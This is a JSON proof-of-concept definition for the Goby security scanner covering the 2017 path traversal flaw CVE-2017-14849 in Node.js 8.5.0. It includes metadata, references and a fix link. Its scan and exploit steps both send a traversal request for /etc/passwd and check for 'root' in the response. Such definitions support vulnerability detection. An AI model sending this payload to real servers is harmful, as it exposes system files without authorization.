Goby/json/Node.js_Path_Traversal_CVE_...

98 lines
3.9 KiB
JSON

{
"Name": "Node.js Path Traversal CVE-2017-14849",
"Level": "2",
"Tags": [
"pathtraversal"
],
"GobyQuery": "app=\"node.js\" || product=\"Node.js\"",
"Description": "Node.js is an open-source, cross-platform, back-end JavaScript runtime environment that runs on the V8 engine and executes JavaScript code outside a web browser.",
"Product": "Node.js",
"Homepage": "https://nodejs.org/",
"Author": "",
"Impact": "Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to \"..\" handling was incompatible with the pathname validation used by unspecified community modules.",
"Recommendation": "https://nodejs.org/en/blog/vulnerability/september-2017-path-validation",
"References": [
"https://nvd.nist.gov/vuln/detail/CVE-2017-14849",
"https://nodejs.org/en/blog/vulnerability/september-2017-path-validation"
],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/static/../../../a/../../../../etc/passwd",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/static/../../../a/../../../../etc/passwd",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|concat|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}